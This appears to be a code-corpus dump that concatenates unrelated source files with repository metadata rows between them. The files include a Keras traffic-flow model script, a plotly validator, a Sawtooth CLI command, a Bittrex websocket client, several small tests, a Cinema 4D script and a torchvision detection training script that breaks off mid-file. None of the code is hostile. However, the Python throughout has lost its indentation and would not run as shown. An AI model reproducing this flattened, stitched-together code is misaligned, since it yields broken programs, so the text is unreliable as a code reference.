x2 = Lambda(lambda x: x[:,:,:,:,np.newaxis])(conv2)
conv = Concatenate()([x1, x2])
a = Dense(2, activation='softmax')(conv)
ax = multiply([conv, a])
ax1 = Lambda(lambda x: x[:,:,:,:,0])(ax)
ax2 = Lambda(lambda x: x[:,:,:,:,1])(ax)
hPallt = add([ax1, ax2])
# hadamard fusion
hft = Hadamard_fusion()([hct, hPallt])
# transform shape
hft_reshap = Conv2D(filters = CHANNEL, kernel_size = (1, 1),
activation = 'relu', padding = 'same')(hft)
# metadata fusion
Xmeta = Input(shape = (meta_dim,))
dens1 = Dense(units = 10, activation = 'relu')(Xmeta)
dens2 = Dense(units = WIDTH*HEIGHT*CHANNEL, activation = 'relu')(dens1)
hmeta = Reshape((WIDTH, HEIGHT, CHANNEL))(dens2)
add2 = Add()([hft_reshap, hmeta])
X_hat = Activation('relu')(add2)
model = Model(inputs = [XC, XP, XT, Xmeta], outputs = X_hat)
return model
def testModel(name, allData, trainData, dayinfo):
print('Model Evaluation Started ...', time.ctime())
assert os.path.exists(PATH + '/' + name + '.h5'), 'model is not existing'
model = load_model(PATH + '/'+ name + '.h5', custom_objects={'Hadamard_fusion': Hadamard_fusion})
model.summary()
XC, XP, XT, YS, YD = getXSYS_CPT_D('test', allData, trainData, dayinfo)
print(XC.shape, XP.shape, XT.shape, YS.shape, YD.shape)
keras_score = model.evaluate(x=[XC, XP, XT, YD], y=YS, verbose=1)
rescale_MSE = keras_score * MAX_FLOWIO * MAX_FLOWIO
f = open(PATH + '/' + name + '_prediction_scores.txt', 'a')
f.write("Keras MSE on testData, %f\n" % keras_score)
f.write("Rescaled MSE on testData, %f\n" % rescale_MSE)
f.close()
print('*' * 40)
print('keras MSE', keras_score)
print('rescaled MSE', rescale_MSE)
print('Model Evaluation Ended ...', time.ctime())
pred = model.predict([XC, XP, XT, YD], verbose=1, batch_size=BATCHSIZE) * MAX_FLOWIO
groundtruth = YS * MAX_FLOWIO
np.save(PATH + '/' + MODELNAME + '_prediction.npy', pred)
np.save(PATH + '/' + MODELNAME + '_groundtruth.npy', groundtruth)
def trainModel(name, allData, trainData, dayinfo):
print('Model Training Started ...', time.ctime())
XC, XP, XT, YS, YD = getXSYS_CPT_D('train', allData, trainData, dayinfo)
print(XC.shape, XP.shape, XT.shape, YS.shape, YD.shape)
model = getModel((None, HEIGHT, WIDTH, CHANNEL), dayinfo.shape[1])
model.compile(loss=LOSS, optimizer=OPTIMIZER)
model.summary()
csv_logger = CSVLogger(PATH + '/' + name + '.log')
checkpointer = ModelCheckpoint(filepath=PATH + '/' + name + '.h5', verbose=1, save_best_only=True)
LR = LearningRateScheduler(lambda epoch: LEARN)
early_stopping = EarlyStopping(monitor='val_loss', patience=10, verbose=1, mode='auto')
model.fit(x=[XC, XP, XT, YD], y=YS, batch_size=BATCHSIZE, epochs=EPOCH, shuffle=True,
callbacks=[csv_logger, checkpointer, LR, early_stopping], validation_split=SPLIT)
keras_score = model.evaluate(x=[XC, XP, XT, YD], y=YS, verbose=1)
rescaled_MSE = keras_score * MAX_FLOWIO * MAX_FLOWIO
f = open(PATH + '/' + name + '_prediction_scores.txt', 'a')
f.write("Keras MSE on trainData, %f\n" % keras_score)
f.write("Rescaled MSE on trainData, %f\n" % rescaled_MSE)
f.close()
print('*' * 40)
print('keras MSE', keras_score)
print('rescaled MSE', rescaled_MSE)
print('Model Training Ended ...', time.ctime())
################# Parameter Setting #######################
MODELNAME = 'PCRNB'
KEYWORD = 'predflowio_' + MODELNAME + '_' + datetime.now().strftime("%y%m%d%H%M")
PATH = '../' + KEYWORD
################# Parameter Setting #######################
###########################Reproducible#############################
import random
np.random.seed(100)
random.seed(100)
os.environ['PYTHONHASHSEED'] = '0' # necessary for py3
import tensorflow as tf
from keras.backend.tensorflow_backend import set_session
tf.set_random_seed(100)
config = tf.ConfigProto(intra_op_parallelism_threads=1, inter_op_parallelism_threads=1)
config.gpu_options.per_process_gpu_memory_fraction = 0.3
config.gpu_options.visible_device_list = '1'
set_session(tf.Session(graph=tf.get_default_graph(), config=config))
###################################################################
def main():
if not os.path.exists(PATH):
os.makedirs(PATH)
currentPython = sys.argv[0]
shutil.copy2(currentPython, PATH)
shutil.copy2('Param.py', PATH)
data = np.load(dataFile)
data = data / MAX_FLOWIO
dayinfo = np.genfromtxt(dataPath + '/day_information_onehot.csv', delimiter=',', skip_header=1)
print('data.shape, dayinfo.shape', data.shape, dayinfo.shape)
train_Num = int(data.shape[0] * trainRatio)
print(KEYWORD, 'training started', time.ctime())
trainvalidateData = data[:train_Num, :, :, :]
print('trainvalidateData.shape', trainvalidateData.shape)
trainModel(MODELNAME, data, trainvalidateData, dayinfo)
print(KEYWORD, 'testing started', time.ctime())
testData = data[train_Num:, :, :, :]
print('testData.shape', testData.shape)
testModel(MODELNAME, data, trainvalidateData, dayinfo)
if __name__ == '__main__':
main()
| 38.977612
| 144
| 0.608367
|
565afb4674211785b6674fcefba571a818546b71
| 437
|
py
|
Python
|
env/Lib/site-packages/plotly/validators/mesh3d/_text.py
|
andresgreen-byte/Laboratorio-1--Inversion-de-Capital
|
8a4707301d19c3826c31026c4077930bcd6a8182
|
[
"MIT"
] | 11,750
|
2015-10-12T07:03:39.000Z
|
2022-03-31T20:43:15.000Z
|
venv/Lib/site-packages/plotly/validators/mesh3d/_text.py
|
wakisalvador/constructed-misdirection
|
74779e9ec640a11bc08d5d1967c85ac4fa44ea5e
|
[
"Unlicense"
] | 2,951
|
2015-10-12T00:41:25.000Z
|
2022-03-31T22:19:26.000Z
|
venv/Lib/site-packages/plotly/validators/mesh3d/_text.py
|
wakisalvador/constructed-misdirection
|
74779e9ec640a11bc08d5d1967c85ac4fa44ea5e
|
[
"Unlicense"
] | 2,623
|
2015-10-15T14:40:27.000Z
|
2022-03-28T16:05:50.000Z
|
import _plotly_utils.basevalidators
class TextValidator(_plotly_utils.basevalidators.StringValidator):
def __init__(self, plotly_name="text", parent_name="mesh3d", **kwargs):
super(TextValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
array_ok=kwargs.pop("array_ok", True),
edit_type=kwargs.pop("edit_type", "calc"),
**kwargs
)
| 33.615385
| 75
| 0.654462
|
b233487d2c9d4366fd73eb20689f90b8f8a283a2
| 4,743
|
py
|
Python
|
cli/sawtooth_cli/state.py
|
RomarQ/sawtooth-core
|
b900f4f3a2ffda9f6fb32a57fd4eacc41be86e5a
|
[
"Apache-2.0"
] | null | null | null |
cli/sawtooth_cli/state.py
|
RomarQ/sawtooth-core
|
b900f4f3a2ffda9f6fb32a57fd4eacc41be86e5a
|
[
"Apache-2.0"
] | null | null | null |
cli/sawtooth_cli/state.py
|
RomarQ/sawtooth-core
|
b900f4f3a2ffda9f6fb32a57fd4eacc41be86e5a
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import argparse
from base64 import b64decode
from sawtooth_cli import format_utils as fmt
from sawtooth_cli.rest_client import RestClient
from sawtooth_cli.exceptions import CliException
from sawtooth_cli.parent_parsers import base_http_parser
from sawtooth_cli.parent_parsers import base_list_parser
def add_state_parser(subparsers, parent_parser):
"""Adds arguments parsers for the state list and state show commands
Args:
subparsers: Add parsers to this subparser object
parent_parser: The parent argparse.ArgumentParser object
"""
parser = subparsers.add_parser(
'state',
help='Displays information on the entries in state',
description='Provides subcommands to display information about the '
'state entries in the current blockchain state.')
grand_parsers = parser.add_subparsers(
title='subcommands',
dest='subcommand')
grand_parsers.required = True
list_parser = grand_parsers.add_parser(
'list',
description='Lists all state entries in the current blockchain.',
parents=[base_http_parser(), base_list_parser()],
formatter_class=argparse.RawDescriptionHelpFormatter)
list_parser.add_argument(
'subtree',
type=str,
nargs='?',
default=None,
help='address of a subtree to filter the list by')
list_parser.add_argument(
'--head',
action='store',
default=None,
help='specify the id of the block to set as the chain head')
show_parser = grand_parsers.add_parser(
'show',
description='Displays information for the specified state address in '
'the current blockchain.',
parents=[base_http_parser()],
formatter_class=argparse.RawDescriptionHelpFormatter)
show_parser.add_argument(
'address',
type=str,
help='address of the leaf')
show_parser.add_argument(
'--head',
action='store',
default=None,
help='specify the id of the block to set as the chain head')
def do_state(args):
"""Runs the batch list or batch show command, printing output to the
console
Args:
args: The parsed arguments sent to the command at runtime
"""
rest_client = RestClient(args.url, args.user)
if args.subcommand == 'list':
response = rest_client.list_state(args.subtree, args.head)
leaves = response['data']
head = response['head']
keys = ('address', 'size', 'data')
headers = tuple(k.upper() for k in keys)
def parse_leaf_row(leaf, decode=True):
decoded = b64decode(leaf['data'])
return (
leaf['address'],
len(decoded),
str(decoded) if decode else leaf['data'])
if args.format == 'default':
fmt.print_terminal_table(headers, leaves, parse_leaf_row)
print('HEAD BLOCK: "{}"'.format(head))
elif args.format == 'csv':
fmt.print_csv(headers, leaves, parse_leaf_row)
print('(data for head block: "{}")'.format(head))
elif args.format == 'json' or args.format == 'yaml':
state_data = {
'head': head,
'data': [dict(zip(keys, parse_leaf_row(l, False)))
for l in leaves]}
if args.format == 'yaml':
fmt.print_yaml(state_data)
elif args.format == 'json':
fmt.print_json(state_data)
else:
raise AssertionError('Missing handler: {}'.format(args.format))
else:
raise AssertionError('Missing handler: {}'.format(args.format))
if args.subcommand == 'show':
output = rest_client.get_leaf(args.address, args.head)
if output is not None:
print('DATA: "{}"'.format(b64decode(output['data'])))
print('HEAD: "{}"'.format(output['head']))
else:
raise CliException('No data available at {}'.format(args.address))
| 34.875
| 80
| 0.622602
|
9c4e5de475a980293124a0b784d2c7d5cddd8208
| 902
|
py
|
Python
|
security_monkey/common/gcp/error.py
|
boladmin/security_monkey
|
c28592ffd518fa399527d26262683fc860c30eef
|
[
"Apache-2.0"
] | 4,258
|
2015-01-04T22:06:10.000Z
|
2022-03-31T23:40:27.000Z
|
security_monkey/common/gcp/error.py
|
boladmin/security_monkey
|
c28592ffd518fa399527d26262683fc860c30eef
|
[
"Apache-2.0"
] | 1,013
|
2015-01-12T02:31:03.000Z
|
2021-09-16T19:09:03.000Z
|
security_monkey/common/gcp/error.py
|
boladmin/security_monkey
|
c28592ffd518fa399527d26262683fc860c30eef
|
[
"Apache-2.0"
] | 965
|
2015-01-11T21:06:07.000Z
|
2022-03-17T16:53:57.000Z
|
# Copyright 2017 Google, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
.. module: security_monkey.common.gcp.error
:platform: Unix
.. version:: $$VERSION$$
.. moduleauthor:: Tom Melendez <supertom@google.com> @supertom
"""
class AuditIssue(object):
def __init__(self, code, notes=None):
self.code = code
self.notes = notes
| 31.103448
| 78
| 0.689579
|
f4cc7970deabec9a4ef78af780eca0d298c0bb5f
| 556
|
py
|
Python
|
functional_tests/prodigy/prodigy_connect.py
|
borisgrafx/client
|
c079f7816947a3092b500751eb920fda3866985f
|
[
"MIT"
] | 3,968
|
2017-08-23T21:27:19.000Z
|
2022-03-31T22:00:19.000Z
|
functional_tests/prodigy/prodigy_connect.py
|
borisgrafx/client
|
c079f7816947a3092b500751eb920fda3866985f
|
[
"MIT"
] | 2,725
|
2017-04-17T00:29:15.000Z
|
2022-03-31T21:01:53.000Z
|
functional_tests/prodigy/prodigy_connect.py
|
borisgrafx/client
|
c079f7816947a3092b500751eb920fda3866985f
|
[
"MIT"
] | 351
|
2018-04-08T19:39:34.000Z
|
2022-03-30T19:38:08.000Z
|
import json
# Monkey patch Prodigy dataset loading for testing
# Would bypass the requirement to maintain local database for storing Prodigy files.
class Database:
def get_dataset(self, dataset):
# load sample dataset in JSON format
file_name = dataset + ".json"
with open('prodigy_test_resources/' + file_name) as f:
data = json.load(f)
return data
return []
class Connect:
def connect(self):
# initialize sample database
database = Database()
return database
| 23.166667
| 84
| 0.647482
|
f2b54c23d46cee15ff4350d6c19a6c30d12d0047
| 1,115
|
py
|
Python
|
api_test/users/tests/test_forms.py
|
withyeah/cre
|
da1904fdb09aec1c9206ab2b3a8e34856df08b9a
|
[
"MIT"
] | null | null | null |
api_test/users/tests/test_forms.py
|
withyeah/cre
|
da1904fdb09aec1c9206ab2b3a8e34856df08b9a
|
[
"MIT"
] | 12
|
2020-06-05T23:55:17.000Z
|
2022-03-12T00:02:20.000Z
|
api_test/users/tests/test_forms.py
|
withyeah/cre
|
da1904fdb09aec1c9206ab2b3a8e34856df08b9a
|
[
"MIT"
] | null | null | null |
import pytest
from api_test.users.forms import UserCreationForm
from api_test.users.tests.factories import UserFactory
pytestmark = pytest.mark.django_db
class TestUserCreationForm:
def test_clean_username(self):
# A user with proto_user params does not exist yet.
proto_user = UserFactory.build()
form = UserCreationForm(
{
"username": proto_user.username,
"password1": proto_user._password,
"password2": proto_user._password,
}
)
assert form.is_valid()
assert form.clean_username() == proto_user.username
# Creating a user.
form.save()
# The user with proto_user params already exists,
# hence cannot be created.
form = UserCreationForm(
{
"username": proto_user.username,
"password1": proto_user._password,
"password2": proto_user._password,
}
)
assert not form.is_valid()
assert len(form.errors) == 1
assert "username" in form.errors
| 27.195122
| 59
| 0.593722
|
17a3145cecb9ddc873348a343919a42d9f48afeb
| 1,310
|
py
|
Python
|
third_party/NW Script Tools/Selection Tools/NW Select Previous Object in Manager.py
|
n1ckfg/C4DToolbox
|
3c23a83ee31e09c4faf0c05933fd491017f30aef
|
[
"MIT"
] | 9
|
2015-02-02T21:26:15.000Z
|
2021-05-21T01:38:21.000Z
|
third_party/NW Script Tools/Selection Tools/NW Select Previous Object in Manager.py
|
DreHit17/C4DToolbox
|
3c23a83ee31e09c4faf0c05933fd491017f30aef
|
[
"MIT"
] | null | null | null |
third_party/NW Script Tools/Selection Tools/NW Select Previous Object in Manager.py
|
DreHit17/C4DToolbox
|
3c23a83ee31e09c4faf0c05933fd491017f30aef
|
[
"MIT"
] | 2
|
2019-01-25T12:33:13.000Z
|
2021-05-21T01:42:48.000Z
|
import c4d # reference Cinema4D's existing library of code, called a "module"
def main(): # Define the main function of the script
ActiveObject = doc.GetActiveObject() # Define ActiveObject to look for the currently selected object in the manager
if ActiveObject == None: return # If there is no object selected, call it quits here
PrevObject = ActiveObject.GetPred() # Look for the previous object in the manager relative to the currently selected object
if PrevObject == None: return # If there is no previous object, call it quits here
doc.StartUndo() # Marks the beginning of a range of code that should be reversible
doc.AddUndo(c4d.UNDOTYPE_BITS, ActiveObject) # Make the following deselection of the active object reversible
ActiveObject.DelBit(c4d.BIT_ACTIVE) # Deselect the active object
doc.AddUndo(c4d.UNDOTYPE_BITS, PrevObject) # Make the following selection of the previous object reversible
PrevObject.SetBit(c4d.BIT_ACTIVE) # Make the previous object an active selection
doc.EndUndo() # Marks the end of a range of code that should be reversible
c4d.EventAdd() # Refresh the scene to update the change
if __name__=='__main__': # These two lines close out the main function. This is usually what will be used to end your script.
main()
| 68.947368
| 127
| 0.755725
|
96b58db3b2c0505d8c3d4806b289fe3bebe4e941
| 10,680
|
py
|
Python
|
aiobittrex/socket.py
|
ape364/aiobittrex
|
f35126664ced09f73905b89b20b0f24e508a2c47
|
[
"MIT"
] | null | null | null |
aiobittrex/socket.py
|
ape364/aiobittrex
|
f35126664ced09f73905b89b20b0f24e508a2c47
|
[
"MIT"
] | null | null | null |
aiobittrex/socket.py
|
ape364/aiobittrex
|
f35126664ced09f73905b89b20b0f24e508a2c47
|
[
"MIT"
] | null | null | null |
import asyncio
import hashlib
import hmac
import json
import logging
import time
from base64 import b64decode
from urllib.parse import urlencode
from zlib import decompress, MAX_WBITS
import aiohttp
from aiobittrex import BittrexSocketError, BittrexSocketConnectionClosed, BittrexSocketConnectionError
logger = logging.getLogger(__name__)
class BittrexSocket:
"""
https://bittrex.github.io/
"""
SOCKET_URL = 'https://socket.bittrex.com/signalr/'
SOCKET_HUB = 'c2'
KEYS = {
'A': 'ask',
'a': 'available',
'B': 'bid',
'b': 'balance',
'C': 'closed',
'c': 'currency',
'CI': 'cancel_initiated',
'D': 'deltas',
'd': 'delta',
'DT': 'order_delta_type',
'E': 'exchange',
'e': 'exchange_delta_type',
'F': 'fill_type',
'FI': 'fill_id',
'f': 'fills',
'G': 'open_buy_orders',
'g': 'open_sell_orders',
'H': 'high',
'h': 'auto_sell',
'I': 'id',
'i': 'is_open',
'J': 'condition',
'j': 'condition_target',
'K': 'immediate_or_cancel',
'k': 'is_conditional',
'L': 'low',
'l': 'last',
'M': 'market_name',
'm': 'base_volume',
'N': 'nonce',
'n': 'commission_paid',
'O': 'orders',
'o': 'order',
'OT': 'order_type',
'OU': 'order_uuid',
'P': 'price',
'p': 'crypto_address',
'PD': 'prev_day',
'PU': 'price_per_unit',
'Q': 'quantity',
'q': 'quantity_remaining',
'R': 'rate',
'r': 'requested',
'S': 'sells',
's': 'summaries',
'T': 'time_stamp',
't': 'total',
'TY': 'type',
'U': 'uuid',
'u': 'updated',
'V': 'volume',
'W': 'account_id',
'w': 'account_uuid',
'X': 'limit',
'x': 'created',
'Y': 'opened',
'y': 'state',
'Z': 'buys',
'z': 'pending'
}
def __init__(self, api_key=None, api_secret=None, loop=None):
self.api_key = api_key
self.api_secret = api_secret
self._socket_url = None
self._loop = loop or asyncio.get_event_loop()
self._session = aiohttp.ClientSession(loop=loop)
async def close(self):
await self._session.close()
@staticmethod
def _decode(message):
try:
deflated_msg = decompress(b64decode(message, validate=True), -MAX_WBITS)
except SyntaxError:
deflated_msg = decompress(b64decode(message, validate=True))
return json.loads(deflated_msg.decode())
@classmethod
def replace_keys(cls, d):
if not isinstance(d, dict):
return d
result = {}
for key, value in d.items():
key = cls.KEYS.get(key, key)
if isinstance(value, dict):
result[key] = cls.replace_keys(value)
elif isinstance(value, list):
result[key] = [cls.replace_keys(v) for v in value]
else:
result[key] = value
return result
async def _get_socket_url(self):
if self._socket_url is None:
conn_data = json.dumps([{'name': self.SOCKET_HUB}])
url = self.SOCKET_URL + 'negotiate' + '?' + urlencode({
'clientProtocol': '1.5',
'connectionData': conn_data,
'_': round(time.time() * 1000)
})
async with self._session.get(url) as r:
socket_conf = await r.json()
self._socket_url = self.SOCKET_URL.replace('https', 'wss') + 'connect' + '?' + urlencode({
'transport': 'webSockets',
'clientProtocol': socket_conf['ProtocolVersion'],
'connectionToken': socket_conf['ConnectionToken'],
'connectionData': conn_data,
'tid': 3
})
return self._socket_url
async def create_ws(self):
return await self._session.ws_connect(await self._get_socket_url())
async def _listen(self, endpoint, messages, ws=None):
ws = ws or await self.create_ws()
for n, m in enumerate(messages, start=1):
await ws.send_str(json.dumps({
'H': self.SOCKET_HUB,
'M': endpoint,
'A': m,
'I': n
}))
async for msg in ws:
if msg.type == aiohttp.WSMsgType.TEXT:
decoded_message = json.loads(msg.data)
if 'E' in decoded_message:
raise BittrexSocketError(decoded_message['E'])
yield decoded_message
elif msg.type == aiohttp.WSMsgType.closed:
logger.warning('Websocket connection closed: %s', msg)
raise BittrexSocketConnectionClosed
elif msg.type == aiohttp.WSMsgType.error:
logger.error('Websocket connection error: %s', msg)
raise BittrexSocketConnectionError
else:
logger.warning("Message: {}".format(msg.type))
async def _get_auth_context(self, ws):
async for m in self._listen(endpoint='GetAuthContext', messages=[[self.api_key]], ws=ws):
if 'R' in m:
return m['R']
async def listen_account(self, ws=None):
"""
Listen to account balance and orders updates.
callbacks:
uB - balance delta
uO - order delta
"""
challenge = await self._get_auth_context(ws)
signature = hmac.new(
key=self.api_secret.encode(),
msg=challenge.encode(),
digestmod=hashlib.sha512
).hexdigest()
async for m in self._listen(endpoint='Authenticate', messages=[[self.api_key, signature]], ws=ws):
if 'R' in m:
assert m['R']
for row in m.get('M') or []:
if row['M'] not in ('uB', 'uO'):
continue
for a in row['A']:
yield self.replace_keys(self._decode(a))
async def get_market(self, markets):
"""
{
"BTC-TRX": {
"market_name": null,
"nonce": 11333,
"buys": [{
"quantity": 428996.57288094,
"rate": 8.65e-06
}],
"sells": [{
"quantity": 91814.92314615,
"rate": 8.66e-06
}],
"fills": [{
"id": 5020055,
"time_stamp": 1524904823903,
"quantity": 34413.0,
"price": 8.66e-06,
"total": 0.29801658,
"fill_type": "FILL",
"order_type": "BUY"
}]
}
}
"""
result = {}
async for m in self._listen(endpoint='QueryExchangeState', messages=[[m] for m in markets]):
if 'R' not in m:
continue
i = int(m['I'])
result[markets[i - 1]] = self.replace_keys(self._decode(m['R']))
if len(result) >= len(markets):
break
return result
async def listen_market(self, markets, ws=None):
"""
Listen to market updates.
callbacks:
- uE - market delta
{
"market_name": "BTC-TRX",
"nonce": 11919,
"buys": [],
"sells": [{
"type": 2,
"rate": 8.7e-06,
"quantity": 197473.52148216
}],
"fills": [{
"order_type": "BUY",
"rate": 8.7e-06,
"quantity": 28376.84449489,
"time_stamp": 1524905878547
}]
}
"""
async for m in self._listen(endpoint='SubscribeToExchangeDeltas', messages=[[m] for m in markets], ws=ws):
for row in m.get('M') or []:
if row['M'] != 'uE':
continue
for a in row['A']:
yield self.replace_keys(self._decode(a))
async def get_summary(self):
"""
{
"nonce": 5108,
"summaries": [{
"market_name": "BTC-ADA",
"high": 3.388e-05,
"low": 3.116e-05,
"volume": 45482116.6444527,
"last": 3.337e-05,
"base_volume": 1481.80378307,
"time_stamp": 1524907023543,
"bid": 3.333e-05,
"ask": 3.337e-05,
"open_buy_orders": 5195,
"open_sell_orders": 15219,
"prev_day": 3.118e-05,
"created": 1506668518873
}]
}
"""
async for m in self._listen(endpoint='QuerySummaryState', messages=['']):
if 'R' in m:
return self.replace_keys(self._decode(m['R']))
async def listen_summary_light(self, ws=None):
"""
callbacks:
- uL - light summary delta
{
"deltas": [{
"market_name": "BTC-ADT",
"last": 7.37e-06,
"base_volume": 118.05
}]
}
"""
async for m in self._listen(endpoint='SubscribeToSummaryLiteDeltas', messages=[''], ws=ws):
for row in m.get('M') or []:
if row['M'] != 'uL':
continue
for a in row['A']:
yield self.replace_keys(self._decode(a))
async def listen_summary(self, ws=None):
"""
callbacks:
- uS - summary delta
{
"nonce": 5069,
"deltas": [{
"market_name": "BTC-ETH",
"high": 0.07371794,
"low": 0.071695,
"volume": 9535.44197173,
"last": 0.07318011,
"base_volume": 695.21677418,
"time_stamp": 1524907827823,
"bid": 0.07318011,
"ask": 0.07346991,
"open_buy_orders": 4428,
"open_sell_orders": 3860,
"prev_day": 0.07188519,
"created": 1439542944817
}]
}
"""
async for m in self._listen(endpoint='SubscribeToSummaryDeltas', messages=[''], ws=ws):
for row in m.get('M') or []:
if row['M'] != 'uS':
continue
for a in row['A']:
yield self.replace_keys(self._decode(a))
| 31.22807
| 114
| 0.469757
|
404184341d793729c1f30de373a63520bf34025c
| 430
|
py
|
Python
|
test/test_login.py
|
IrinaSlobodchikova/marker
|
72f981134fb025a94348cd2bc829fa8430a01372
|
[
"Apache-2.0"
] | null | null | null |
test/test_login.py
|
IrinaSlobodchikova/marker
|
72f981134fb025a94348cd2bc829fa8430a01372
|
[
"Apache-2.0"
] | null | null | null |
test/test_login.py
|
IrinaSlobodchikova/marker
|
72f981134fb025a94348cd2bc829fa8430a01372
|
[
"Apache-2.0"
] | null | null | null |
#def test_marker_login(app):
# username = app.username
# password = app.password
# app.session.ensure_login_marker(username, password)
# user = app.session.get_logged_user_marker()
# assert username == user
def test_marker_login(app):
username = app.username
password = app.password
app.sessionSM.sm_login(username, password)
user = app.sessionSM.get_logged_user_sm()
assert username == user
| 26.875
| 56
| 0.718605
|
90bedf995290b70cdc1c1e8156090b8562036407
| 1,031
|
py
|
Python
|
xhr/resources/conditional.py
|
shs96c/web-platform-tests
|
61acad6dd9bb99d32340eb41f5146de64f542359
|
[
"BSD-3-Clause"
] | 4
|
2020-09-09T15:28:01.000Z
|
2021-12-01T00:59:56.000Z
|
xhr/resources/conditional.py
|
shs96c/web-platform-tests
|
61acad6dd9bb99d32340eb41f5146de64f542359
|
[
"BSD-3-Clause"
] | 1
|
2021-03-31T20:23:55.000Z
|
2021-03-31T20:23:55.000Z
|
xhr/resources/conditional.py
|
shs96c/web-platform-tests
|
61acad6dd9bb99d32340eb41f5146de64f542359
|
[
"BSD-3-Clause"
] | 1
|
2020-03-31T17:20:54.000Z
|
2020-03-31T17:20:54.000Z
|
def main(request, response):
tag = request.GET.first("tag", None)
match = request.headers.get("If-None-Match", None)
date = request.GET.first("date", "")
modified = request.headers.get("If-Modified-Since", None)
cors = request.GET.first("cors", None)
if request.method == "OPTIONS":
response.headers.set("Access-Control-Allow-Origin", "*")
response.headers.set("Access-Control-Allow-Headers", "IF-NONE-MATCH")
return ""
if tag:
response.headers.set("ETag", '"%s"' % tag)
elif date:
response.headers.set("Last-Modified", date)
if cors:
response.headers.set("Access-Control-Allow-Origin", "*")
if ((match is not None and match == tag) or
(modified is not None and modified == date)):
response.status = (304, "SUPERCOOL")
return ""
else:
if not cors:
response.headers.set("Access-Control-Allow-Origin", "*")
response.headers.set("Content-Type", "text/plain")
return "MAYBE NOT"
| 34.366667
| 77
| 0.604268
|
09bc6334718f8576d8c8fe62b7e0168b5f33bbe2
| 10,445
|
py
|
Python
|
references/detection/train.py
|
futurelife2016/vision
|
bbd9ff8fb936846aa0412996abab19b563677e5b
|
[
"BSD-3-Clause"
] | 1
|
2022-01-06T01:58:01.000Z
|
2022-01-06T01:58:01.000Z
|
references/detection/train.py
|
futurelife2016/vision
|
bbd9ff8fb936846aa0412996abab19b563677e5b
|
[
"BSD-3-Clause"
] | null | null | null |
references/detection/train.py
|
futurelife2016/vision
|
bbd9ff8fb936846aa0412996abab19b563677e5b
|
[
"BSD-3-Clause"
] | null | null | null |
r"""PyTorch Detection Training.
To run in a multi-gpu environment, use the distributed launcher::
python -m torch.distributed.launch --nproc_per_node=$NGPU --use_env \
train.py ... --world-size $NGPU
The default hyperparameters are tuned for training on 8 gpus and 2 images per gpu.
--lr 0.02 --batch-size 2 --world-size 8
If you use different number of gpus, the learning rate should be changed to 0.02/8*$NGPU.
On top of that, for training Faster/Mask R-CNN, the default hyperparameters are
--epochs 26 --lr-steps 16 22 --aspect-ratio-group-factor 3
Also, if you train Keypoint R-CNN, the default hyperparameters are
--epochs 46 --lr-steps 36 43 --aspect-ratio-group-factor 3
Because the number of images is smaller in the person keypoint subset of COCO,
the number of epochs should be adapted so that we have the same number of iterations.
"""
import datetime
import os
import time
import presets
import torch
import torch.utils.data
import torchvision
import torchvision.models.detection
import torchvision.models.detection.mask_rcnn
import utils
from coco_utils import get_coco, get_coco_kp
from engine import train_one_epoch, evaluate
from group_by_aspect_ratio import GroupedBatchSampler, create_aspect_ratio_groups
try:
from torchvision.prototype import models as PM
except ImportError:
PM = None
def get_dataset(name, image_set, transform, data_path):
paths = {"coco": (data_path, get_coco, 91), "coco_kp": (data_path, get_coco_kp, 2)}
p, ds_fn, num_classes = paths[name]
ds = ds_fn(p, image_set=image_set, transforms=transform)
return ds, num_classes
def get_transform(train, args):
if train:
return presets.DetectionPresetTrain(args.data_augmentation)
elif not args.weights:
return presets.DetectionPresetEval()
else:
fn = PM.detection.__dict__[args.model]
weights = PM._api.get_weight(fn, args.weights)
return weights.transforms()
def get_args_parser(add_help=True):
import argparse
parser = argparse.ArgumentParser(description="PyTorch Detection Training", add_help=add_help)
parser.add_argument("--data-path", default="/datasets01/COCO/022719/", type=str, help="dataset path")
parser.add_argument("--dataset", default="coco", type=str, help="dataset name")
parser.add_argument("--model", default="maskrcnn_resnet50_fpn", type=str, help="model name")
parser.add_argument("--device", default="cuda", type=str, help="device (Use cuda or cpu Default: cuda)")
parser.add_argument(
"-b", "--batch-size", default=2, type=int, help="images per gpu, the total batch size is $NGPU x batch_size"
)
parser.add_argument("--epochs", default=26, type=int, metavar="N", help="number of total epochs to run")
parser.add_argument(
"-j", "--workers", default=4, type=int, metavar="N", help="number of data loading workers (default: 4)"
)
parser.add_argument(
"--lr",
default=0.02,
type=float,
help="initial learning rate, 0.02 is the default value for training on 8 gpus and 2 images_per_gpu",
)
parser.add_argument("--momentum", default=0.9, type=float, metavar="M", help="momentum")
parser.add_argument(
"--wd",
"--weight-decay",
default=1e-4,
type=float,
metavar="W",
help="weight decay (default: 1e-4)",
dest="weight_decay",
)
parser.add_argument(
"--lr-scheduler", default="multisteplr", type=str, help="name of lr scheduler (default: multisteplr)"
)
parser.add_argument(
"--lr-step-size", default=8, type=int, help="decrease lr every step-size epochs (multisteplr scheduler only)"
)
parser.add_argument(
"--lr-steps",
default=[16, 22],
nargs="+",
type=int,
help="decrease lr every step-size epochs (multisteplr scheduler only)",
)
parser.add_argument(
"--lr-gamma", default=0.1, type=float, help="decrease lr by a factor of lr-gamma (multisteplr scheduler only)"
)
parser.add_argument("--print-freq", default=20, type=int, help="print frequency")
parser.add_argument("--output-dir", default=".", type=str, help="path to save outputs")
parser.add_argument("--resume", default="", type=str, help="path of checkpoint")
parser.add_argument("--start_epoch", default=0, type=int, help="start epoch")
parser.add_argument("--aspect-ratio-group-factor", default=3, type=int)
parser.add_argument("--rpn-score-thresh", default=None, type=float, help="rpn score threshold for faster-rcnn")
parser.add_argument(
"--trainable-backbone-layers", default=None, type=int, help="number of trainable layers of backbone"
)
